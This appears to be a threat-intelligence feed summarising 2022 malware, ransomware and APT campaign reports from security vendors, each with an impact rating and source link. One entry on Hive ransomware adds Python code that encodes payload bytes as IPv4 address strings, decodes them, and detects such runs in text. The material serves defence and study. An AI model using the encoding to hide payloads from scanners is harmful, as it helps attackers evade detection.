- TA578_distributing_Bumblebee_malware
- Date of Scan:
- 2022-05-12
- Impact:
- Medium
- Summary:
- Researchers at ISC.SANS analysed a campaign in which threat actor TA578 leveraged thread-hijacked emails to push ISO files for Bumblebee malware. These thread-hijacked emails have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Examining_BlackBasta_ransomware
- Date of Scan:
- 2022-05-11
- Impact:
- Medium
- Summary:
- Trend Micro researchers have examined the whole infection routine of Black Basta ransomware and its infection tactics.
—
- Intel Source:
- checkpoint
- Intel Name:
- German_Automakers_targeted_by_InfoStealer_campaign
- Date of Scan:
- 2022-05-11
- Impact:
- Low
- Summary:
- Check Point researchers discovered a years-long phishing campaign that has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.
Source:
https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/
—
- Intel Source:
- SecureWorks
- Intel Name:
- REvil_returns_reemergening_GOLD_SOUTHFIELD
- Date of Scan:
- 2022-05-11
- Impact:
- High
- Summary:
- SecureWorks Counter Threat Unit has analysed REvil ransomware samples that indicate GOLD SOUTHFIELD has resumed operations. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
Source:
https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence
—
- Intel Source:
- Qualys
- Intel Name:
- New_Wave_of_Ursnif_Malware
- Date of Scan:
- 2022-05-11
- Impact:
- High
- Summary:
- Researchers at Qualys discovered and analysed several phishing emails in which a macro-embedded XLS attachment, or a zip attachment containing an HTA file, initiated the infection chain. Researchers attributed this targeted attack to Ursnif malware, one of the most widespread banking trojans.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Different_elements_of_Cobalt_Strike
- Date of Scan:
- 2022-05-11
- Impact:
- Medium
- Summary:
- Palo Alto Unit 42 researchers analysed the Cobalt Strike tool, walking through its encoding algorithms, describing the definitions and differences of the encoding types used in the Cobalt Strike framework, and covering some malicious attacks seen in the wild.
—
- Intel Source:
- Fortinet
- Intel Name:
- Recent Emotet Maldoc Outbreak
- Date of Scan:
- 2022-04-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet have identified that a recent Emotet outbreak is being spread through a variety of malicious Microsoft Office files, or maldocs, attached to phishing emails. Once a victim opens the attached document, a VBA macro or Excel 4.0 macro is used to execute malicious code that downloads and runs the Emotet malware.
Source:
https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak
—
- Intel Source:
- Symantec
- Intel Name:
- Lazarus Group Targets Chemical Sector
- Date of Scan:
- 2022-04-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed the Lazarus group conducting an espionage campaign targeting organizations operating within the chemical sector. This campaign has been dubbed Operation Dream Job.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
—
- Intel Source:
- Seguranca-Informatica
- Intel Name:
- SunnyDay Ransomware
- Date of Scan:
- 2022-04-19
- Impact:
- LOW
- Summary:
- Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work, some similarities with other ransomware samples such as Ever101, Medusa Locker, Curator and Payment45 were found. According to the analysis, “SunnyDay is a simple piece of ransomware based on the SALSA20 stream cipher”. SALSA20 is easy to recognize because it uses well-known constant values in its internal cryptographic operations.
Source:
https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/#.Yl0eXdtBxPY
—
- Intel Source:
- Microsoft/ESET
- Intel Name:
- Coordinated disruption of Zloader operation
- Date of Scan:
- 2022-04-19
- Impact:
- LOW
- Summary:
- Microsoft’s DCU has taken technical action against ZLoader and disrupted its operations. ZLoader is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money.
—
- Intel Source:
- Cynet
- Intel Name:
- BumbleBee Malware campaign
- Date of Scan:
- 2022-04-18
- Impact:
- LOW
- Summary:
- Researchers from Cynet Security found a new campaign that, instead of using malicious Office documents, uses malicious ISO image files to lure victims into executing the BumbleBee malware.
Source:
https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/
—
- Intel Source:
- STR
- Intel Name:
- CVE_2022_22954_Seeder_Queries_14042022
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Prodaft
- Intel Name:
- Indepth analysis of PYSA Ransomware Group
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at PRODAFT have identified and gained visibility into PYSA’s ransomware infrastructure and analyzed their findings to gain insight into how the criminal operation works.
Source:
https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis
—
- Intel Source:
- STR
- Intel Name:
- CVE_2022_24527_Seeder_Queries_14042022
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- CERT-UA
- Intel Name:
- XSS Vulnerability in Zimbra leveraged to target Ukraine Government
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- CERT-UA has detected threat actors targeting Ukrainian government agencies with new attacks exploiting a Zimbra XSS vulnerability (CVE-2018-6882). CERT-UA has attributed this campaign to UAC-0097, a currently unknown actor.
—
- Intel Source:
- netlab360
- Intel Name:
- New Fodcha DDoS botnet
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Qihoo 360’s Network Security Research Lab have discovered a new DDoS botnet called ‘Fodcha’. The botnet spread to over 62,000 devices between March 29 and April 10. Based on the unique IP addresses linked to the botnet, researchers are tracking a 10,000-strong Fodcha army of bots using Chinese IP addresses every day.
Source:
https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/
—
- Intel Source:
- SecureList
- Intel Name:
- Emotet Modules and Recent Attacks
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Kaspersky were able to retrieve 10 of the 16 modules used by Emotet for credential/password/account/e-mail stealing and spamming. Statistics on recent Emotet attacks were also shared.
Source:
https://securelist.com/emotet-modules-and-recent-attacks/106290/
—
- Intel Source:
- SecureList
- Intel Name:
- New File extensions added to BlackCat ransomware’s arsenal
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureList have analysed the BlackCat ransomware group’s activities since its inception. They also compare BlackCat’s TTPs with those of the BlackMatter group, such as a custom exfiltration tool called ‘Fendr’ that had previously been used exclusively in BlackMatter ransomware activity.
—
- Intel Source:
- Microsoft
- Intel Name:
- Critical Remote Code Execution Vulnerability in Windows RPC Runtime
- Date of Scan:
- 2022-04-14
- Impact:
- HIGH
- Summary:
- Microsoft’s April 2022 Patch Tuesday introduced patches for more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in the Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492, CVE-2022-24528 and CVE-2022-26809. By exploiting these vulnerabilities, a remote unauthenticated attacker can execute code on the vulnerable machine with the privileges of the RPC service, which depend on the process hosting the RPC runtime.
—
- Intel Source:
- Fortinet
- Intel Name:
- Enemybot leveraged by Keksec group
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers at FortiGuard Labs have identified a new DDoS botnet called “Enemybot” and attributed it to a threat group called ‘Keksec’ that specializes in cryptomining and DDoS attacks. This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
Source:
https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet
—
- Intel Source:
- ASEC
- Intel Name:
- Virus/XLS Xanpei Infecting Excel Files
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- The ASEC research team has identified the continued distribution of malware strains that spread the infection when an Excel file is opened. Upon opening the infected Excel file, a file containing the virus VBA code is dropped into the Excel startup path. Whenever any Excel file is subsequently opened, the malicious file in the Excel startup path is automatically executed to spread the infection and perform additional malicious behaviors.
—
- Intel Source:
- Group-IB
- Intel Name:
- OldGremlin Gang resumes attack with new methods
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Group-IB has uncovered new attack tools and methods used by the OldGremlin ransomware group. The group was first identified by Group-IB researchers in spring 2020; over the past two years, OldGremlin has conducted 13 malicious email campaigns. Researchers also discovered two variants of the TinyFluff malware: an earlier one that is more complex and a newer, simplified version that copies the script and the Node.js interpreter from its storage location.
—
- Intel Source:
- CERT-UA
- Intel Name:
- IcedID malware targeting Ukraine state bodies
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has issued a new heads-up warning of an ongoing cyber-attack leveraging the infamous IcedID malware to compromise Ukrainian state bodies. The detected malware, also known as BankBot or BokBot, is a banking Trojan primarily designed to target financial data and steal banking credentials.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Malware Campaigns Targeting African Banking Sector
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- A cybercrime campaign targeting the African banking sector is leveraging phishing emails and HTML smuggling techniques to deploy malware. Researchers from HP Wolf Security have been tracking the campaign since early 2022, when an employee of an unnamed West African bank received an email purporting to be from a recruiter at another African bank with information about job opportunities.
Source:
https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- ZingoStealer by Haskers Group
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos have identified a new information stealer called ‘ZingoStealer’ that has been released for free by a threat actor known as ‘Haskers Gang.’ This information stealer, first introduced to the wild in March 2022, is currently undergoing active development, and multiple releases of new versions have been observed recently.
—
- Intel Source:
- 360 Beacon Lab
- Intel Name:
- Bahamut group recent attacks
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Researchers at 360 Beacon Lab have identified suspected mobile attack activity by the Bahamut group. Bahamut is an advanced threat group targeting the Middle East and South Asia. The group mainly uses phishing websites, fake news websites and social networking sites in its attacks.
Source:
https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN
—
- Intel Source:
- CERT-UA
- Intel Name:
- Sandworm Group (UAC-0082) targeting Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- CERT-UA has taken urgent measures to respond to an information security incident related to a targeted attack on Ukraine’s energy facility.
—
- Intel Source:
- ASEC
- Intel Name:
- SystemBC Malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- The ASEC research team has identified a proxy malware called SystemBC that has been used by various attackers for the last few years. While it is currently distributed through SmokeLoader or Emotet, this malware has steadily been used in various ransomware attacks in the past.
—
- Intel Source:
- TeamCymru
- Intel Name:
- MoqHao Malware targeting European countries
- Date of Scan:
- 2022-04-12
- Impact:
- LOW
- Summary:
- Researchers at Team Cymru have examined the current target base of the Roaming Mantis group, which is leveraging MoqHao malware to target European countries. MoqHao is generally used to target Android users, often via an initial attack vector of smishing.
Source:
https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/
—
- Intel Source:
- ClearSky
- Intel Name:
- EvilNominatus Ransomware
- Date of Scan:
- 2022-04-12
- Impact:
- LOW
- Summary:
- Researchers at ClearSky have detected a malicious BAT file that was uploaded to VirusTotal from Iran. This file executes ransomware associated with the EvilNominatus ransomware initially exposed at the end of 2021. Researchers believe that the ransomware’s developer is a young Iranian who bragged about its development on Twitter.
Source:
https://www.clearskysec.com/wp-content/uploads/2022/04/EvilNominatus_Ransomware_7.4.22.pdf
—
- Intel Source:
- STR
- Intel Name:
- NetSupport RAT_Seeder_Queries_08/04/2022
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Microsoft
- Intel Name:
- Tarrask – HAFNIUM APT defense evasion malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence Center has tracked the Chinese-backed Hafnium hacking group and linked it to a new piece of malware that is used to maintain persistence in compromised Windows environments. MSTIC has dubbed the defense evasion malware ‘Tarrask’ and characterized it as a tool that creates ‘hidden’ scheduled tasks on the system.
—
- Intel Source:
- Palo Alto
- Intel Name:
- New version of SolarMarker Malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- A new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, has been identified by Palo Alto Networks and is believed to be active as of April 2022. This malware has been prevalent since September 2020, targeting U.S. organizations; part of its infrastructure is still active as of 2022, in addition to new infrastructure that attackers have recently deployed.
Source:
https://unit42.paloaltonetworks.com/solarmarker-malware/
—
- Intel Source:
- Cofense
- Intel Name:
- Fake COVID-19 forms targeting companies
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Cofense Phishing Defense Center has analysed a phishing campaign in which threat actors impersonate companies to send out fake COVID-19 forms. The CPDC team saw a phishing email masquerading as a general office-wide email claiming that someone in the building has been infected with COVID-19 and asking recipients to review the company policy.
Source:
https://cofense.com/blog/covid-19-phish-targeting-companies
—
- Intel Source:
- Cluster25
- Intel Name:
- DPRK-Nexus threat actor spear-phishing campaign
- Date of Scan:
- 2022-04-11
- Impact:
- LOW
- Summary:
- Researchers at Cluster25 have identified recent activity, starting in the early days of April 2022, from a DPRK-nexus threat actor using spear-phishing emails containing Korean-based malicious documents with different lures to compromise its victims.
Source:
https://cluster25.io/2022/04/11/dprk-nexus-adversary-new-kitty-phishing/
—
- Intel Source:
- Meta
- Intel Name:
- Multiple cyber espionage operations disrupted
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Meta has shared its Adversarial Threat Report, which provides a broader view of the cyber threats Facebook observes in Iran, Azerbaijan, Ukraine, Russia, South America and the Philippines.
Source:
https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- FFDroider Stealer Targeting Social Media Platforms
- Date of Scan:
- 2022-04-11
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have discovered many new types of stealer malware across different attack campaigns, including a novel Windows-based malware dubbed FFDroider, which creates a registry key and is designed to send stolen credentials and cookies to a C&C server.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Mirai Botnet exploiting Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- The Trend Micro research team has confirmed earlier reports that the new Spring4Shell vulnerability has been exploited by the Mirai botnet. The Mirai sample is downloaded to the ‘/tmp’ folder and executed after its permissions are changed with ‘chmod’ to make it executable.
—
- Intel Source:
- Cado security
- Intel Name:
- Denonia Malware specifically targeting AWS Lambda
- Date of Scan:
- 2022-04-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Cado Security published their findings on a new malware called ‘Denonia’ that targets AWS Lambda. On further investigation, the researchers found the sample was a 64-bit ELF executable. The malware also relies on third-party GitHub libraries, including those for writing Lambda functions and retrieving data from Lambda invoke requests.
Source:
https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting European Union institutions
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese APT targets Indian Power Grid
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future find continued targeting of the Indian power grid by a Chinese state-sponsored activity group, likely intended to enable information gathering surrounding critical infrastructure systems.
Source:
https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0010 group/Armageddon targeting Ukraine government
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Ukraine’s Computer Emergency Response Team (CERT-UA) revealed on Monday a string of phishing emails that they’ve linked to a Russian state-sponsored actor called Armageddon. The attacks baited Ukrainian and Latvian government officials with information concerning the war between Ukraine and Russia.
—
- Intel Source:
- Avast
- Intel Name:
- Parrot TDS takes over compromised websites
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Avast researchers have published a report stating that a new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university sites and local government sites.
Source:
https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/
—
- Intel Source:
- Cybereason
- Intel Name:
- Operation Bearded Barbie
- Date of Scan:
- 2022-04-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cybereason discovered a new APT-C-23 campaign targeting high-profile Israelis working for sensitive defense, law enforcement and emergency services organizations. The investigation revealed that APT-C-23 has upgraded its malware arsenal with new tools dubbed Barb(ie) Downloader and BarbWire Backdoor.
—
- Intel Source:
- Fortinet
- Intel Name:
- Remcos RAT phishing campaign
- Date of Scan:
- 2022-04-08
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs share their analysis of the Remcos RAT, delivered by a phishing campaign and used by malicious actors to control victims’ devices.
Source:
https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing
—
- Intel Source:
- Trend Micro
- Intel Name:
- BLISTER & SocGholish loaders delivering LockBit Ransomware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro discovered a campaign in which BLISTER and SocGholish, two loaders known for their evasion tactics, were used to deliver LockBit ransomware.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Colibri Loader campaign delivering the Vidar Stealer
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes recently uncovered a new Colibri Loader campaign that delivers the Vidar Stealer as its final payload and uses a clever persistence technique combining Task Scheduler and PowerShell.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious Word Documents Using MS Media Player
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- ASEC researchers have analysed a malicious Word file distributed with text that impersonates AhnLab. The Word file downloads another Word file containing a malicious VBA macro from an external URL and runs it. The downloaded file uses a Windows Media Player function instead of AutoOpen() to run the VBA macro automatically.
—
- Intel Source:
- Symantec
- Intel Name:
- Cicada/APT10 new espionage campaign
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at Symantec have discovered an espionage campaign by the Chinese APT group APT10/Cicada. Victims identified in this campaign include government, legal, religious and non-governmental organizations (NGOs) in multiple countries across Europe, Asia and North America.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New AsyncRAT campaign features 3LOSH crypter
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Cisco Talos Intelligence Group discovered ongoing malware distribution campaigns that use ISO disk images to deliver AsyncRAT and other commodity malware to victims. The campaigns appear to be linked to a new version of the 3LOSH crypter.
Source:
https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html
—
- Intel Source:
- Mandiant
- Intel Name:
- Evolution of FIN7 group
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Mandiant published research on the evolution of FIN7 drawn from both historical and recent intrusions, describing the process of merging eight previously suspected UNC groups into FIN7. The researchers also highlight notable shifts in FIN7 activity over time, including the use of novel malware, the incorporation of new initial access vectors and shifts in monetization strategies.
Source:
https://www.mandiant.com/resources/evolution-of-fin7
—
- Intel Source:
- Morphisec
- Intel Name:
- CaddyWiper Malware- New Analysis
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Morphisec share a new analysis of the CaddyWiper malware, which has surfaced as the fourth destructive wiper attacking Ukrainian infrastructure. CaddyWiper destroys user data and partition information from attached drives and has been spotted on several dozen systems in a limited number of organizations.
Source:
https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Windows MetaStealer Malware
- Date of Scan:
- 2022-04-07
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS have analysed 16 samples of Excel files submitted to VirusTotal on 30-03-2022; the files are distributed as email attachments. Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity.
—
- Intel Source:
- McAfee
- Intel Name:
- Scammers are Exploiting Ukraine Donations
- Date of Scan:
- 2022-04-07
- Impact:
- LOW
- Summary:
- McAfee researchers have identified malicious sites and emails used by attackers to lure netizens into a cryptocurrency donation scam.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-are-exploiting-ukraine-donations/
—
- Intel Source:
- Cofense
- Intel Name:
- New Rat campaign leverages Tax Season
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defense Center team has discovered a tactic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. The campaign leverages NetSupport Manager, a troubleshooting and screen control program, as a malicious remote access trojan (RAT) the threat actor employs to remotely enter user systems.
Source:
https://cofense.com/blog/rat-campaign-looks-to-take-advantage-of-the-tax-season
—
- Intel Source:
- SecureList
- Intel Name:
- Lazarus Group New Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- LOW
- Summary:
- Researchers at SecureList have discovered that a trojanized DeFi application was used by the Lazarus Group to deliver a backdoor. The DeFi application contains a legitimate program called DeFi Wallet, which saves and manages a cryptocurrency wallet, but also implants a malicious file when executed.
Source:
https://securelist.com/lazarus-trojanized-defi-app/106195/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New UAC-0056 Group activity
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer Labs shared that UAC-0056 (TA471, SaintBear, UNC2589) has been launching targeted spear phishing campaigns using spoofed Ukrainian governmental email addresses to deliver the Elephant malware framework, written in Go.
—
- Intel Source:
- Fortinet
- Intel Name:
- Mirai campaign updated its arsenal of exploits
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet Labs have identified that the Beastmode Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, three of them targeting various models of TOTOLINK routers.
Source:
https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign
—
- Intel Source:
- DFIR Report
- Intel Name:
- Stolen Image Evidence Campaign
- Date of Scan:
- 2022-04-06
- Impact:
- MEDIUM
- Summary:
- Researchers at The DFIR Report have identified a single Conti ransomware deployment from December that appears to be part of a larger campaign. The attack utilized IcedID, a well-known banking trojan, delivered via the ‘Stolen Images Evidence’ email campaign.
Source:
https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
—
- Intel Source:
- Qianxin
- Intel Name:
- VajraEleph (APT-Q-43) group New campaign
- Date of Scan:
- 2022-04-05
- Impact:
- LOW
- Summary:
- The mobile security team of Qianxin Technology HK Co. Limited Virus Response Center identified that the VajraEleph (APT-Q-43) group has been carrying out targeted military espionage activities against the Pakistani military.
—
- Intel Source:
- Morphisec
- Intel Name:
- Remcos Rat Phishing Campaign
- Date of Scan:
- 2022-04-05
- Impact:
- MEDIUM
- Summary:
- Morphisec Labs has detected a new wave of Remcos RAT infections being spread through phishing emails masquerading as payment remittances sent from financial institutions.
Source:
https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain
—
- Intel Source:
- ASEC
- Intel Name:
- North Korea related files distributed via malicious VB Scripts
- Date of Scan:
- 2022-04-04
- Impact:
- LOW
- Summary:
- ASEC researchers have analysed phishing emails related to North Korea that carry a compressed file as an attachment. The email refers to writing a resume to induce execution of the attached file; a malicious VBS script file exists inside the compressed file.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Hive Ransomware leveraging IPfuscation Technique
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne have discovered a new obfuscation technique used by the Hive ransomware gang which involves IPv4 addresses and a series of conversions that eventually lead to downloading a Cobalt Strike beacon.
Source:
https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/
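The conversion the summary refers to, shown as an added example rather than code from SentinelOne’s report: the payload is stored as a list of dotted-quad strings, four bytes per “address”, and a loader turns the strings back into raw bytes at runtime (on Windows via RtlIpv4StringToAddressA) before executing them. The encoder, the decoder and the run-length heuristic for spotting such a blob in strings output are this example’s own; the sample listing and the 64-byte payload are constructed and stand in for shellcode.

```python
import re
import socket
from typing import List, Optional

# One dotted-quad octet (0-255) and a full IPv4 literal, anchored on word boundaries.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"\b{_OCTET}(?:\.{_OCTET}){{3}}\b")
# Separators that may sit between two literals of the same encoded blob
# (quotes, commas, semicolons and whitespace in a C array or a script list).
GAP_RE = re.compile(r"""[\s,;"']*""")


def encode_ipv4_strings(payload: bytes) -> List[str]:
    """Store raw bytes as dotted-quad strings, four bytes per 'address'.

    This is the representation an IPfuscated loader carries instead of a byte
    array. Assumption: the payload is NUL-padded to a multiple of four.
    """
    padded = payload + b"\x00" * (-len(payload) % 4)
    return [socket.inet_ntoa(padded[i:i + 4]) for i in range(0, len(padded), 4)]


def decode_ipv4_strings(addresses: List[str]) -> bytes:
    """Undo the encoding: each literal becomes its four raw bytes.

    socket.inet_aton plays the role RtlIpv4StringToAddressA plays in the loader.
    """
    return b"".join(socket.inet_aton(a) for a in addresses)


def find_ipfuscated_blob(text: str, min_run: int = 16) -> Optional[List[str]]:
    """Return the longest run of IPv4 literals separated only by GAP_RE characters,
    or None when no run reaches min_run. A handful of addresses is normal in a
    config; dozens in a row with nothing but delimiters between them is not.
    """
    runs: List[List[str]] = []
    current: List[str] = []
    last_end = 0
    for m in IPV4_RE.finditer(text):
        if current and not GAP_RE.fullmatch(text[last_end:m.start()]):
            runs.append(current)
            current = []
        current.append(m.group())
        last_end = m.end()
    if current:
        runs.append(current)
    best = max(runs, key=len, default=[])
    return best if len(best) >= min_run else None


# Constructed sample: 64 arbitrary bytes stand in for shellcode, embedded in a
# fake source listing next to an unrelated pair of ordinary server addresses.
SAMPLE_PAYLOAD = bytes(range(0x40, 0x80))
SAMPLE_TEXT = (
    "const char* ips[] = {\n    "
    + ",\n    ".join(f'"{a}"' for a in encode_ipv4_strings(SAMPLE_PAYLOAD))
    + "\n};\n"
    "// unrelated settings elsewhere in the same binary\n"
    "primary = 10.0.0.1; backup = 10.0.0.2;\n"
)

if __name__ == "__main__":
    blob = find_ipfuscated_blob(SAMPLE_TEXT)
    print(f"run of {len(blob)} literals, decodes to {len(decode_ipv4_strings(blob))} bytes")
```

Decoding alone cannot tell a payload from a legitimate address list, since any list of IPv4 strings decodes to some bytes; the run length is the signal, and what you do with the decoded bytes (scan them, disassemble them, check for a known stager) is the confirmation.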
—
- Intel Source:
- Checkpoint
- Intel Name:
- State sponsored groups leveraging RU-UA conflict
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Check Point provide an overview of several campaigns by different APT groups that use the ongoing Russia-Ukraine war to increase the efficiency of their operations. They also discuss the victimology of these campaigns and the tactics used, and provide technical analysis of the observed malicious payloads and malware specially crafted for this cyber-espionage.
—
- Intel Source:
- Zscaler
- Intel Name:
- BlackGuard – new infostealer malware
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- The Zscaler ThreatLabz team came across BlackGuard, a sophisticated stealer currently being advertised as malware-as-a-service for a monthly price of $200. The researchers share their analysis of the techniques the BlackGuard stealer uses to steal information and evade detection through obfuscation, as well as its anti-debugging techniques.
—
- Intel Source:
- Trellix
- Intel Name:
- New PlugX variant used by Chinese APT group
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- Researchers at Trellix have discovered a new variant of the PlugX malware named ‘Talisman’. The new variant follows the usual execution process of abusing a signed, benign binary that loads a modified DLL to execute shellcode. The shellcode decrypts the PlugX payload, which then serves as a backdoor with plug-in capabilities.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html
—
- Intel Source:
- Morphisec
- Intel Name:
- Mars InfoStealer new operation
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- The Morphisec Labs team has analysed a campaign in which the actor distributed Mars Stealer via cloned websites offering well-known software. The Morphisec team attributes this actor to a Russian national based on the screenshots and keyboard details found in the extracted system.txt.
Source:
https://blog.morphisec.com/threat-research-mars-stealer
—
- Intel Source:
- SentinelOne
- Intel Name:
- Acid Rain wiper malware targets Viasat KA-SAT modems
- Date of Scan:
- 2022-04-04
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have analysed AcidRain, a new wiper that has been targeting Europe, specifically Viasat KA-SAT modems. The wiper is an ELF MIPS binary designed to wipe modems and routers.
Source:
https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/
—
- Intel Source:
- Securonix
- Intel Name:
- Spring4Shell Vulnerability
- Date of Scan:
- 2022-04-01
- Impact:
- HIGH
- Summary:
- The Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core, a widely used Java-based framework with cross-platform support. Early details claim that the bug allows full remote code execution (RCE) on affected systems.
Source:
https://www.securonix.com/blog/detection-and-analysis-of-spring4shell/
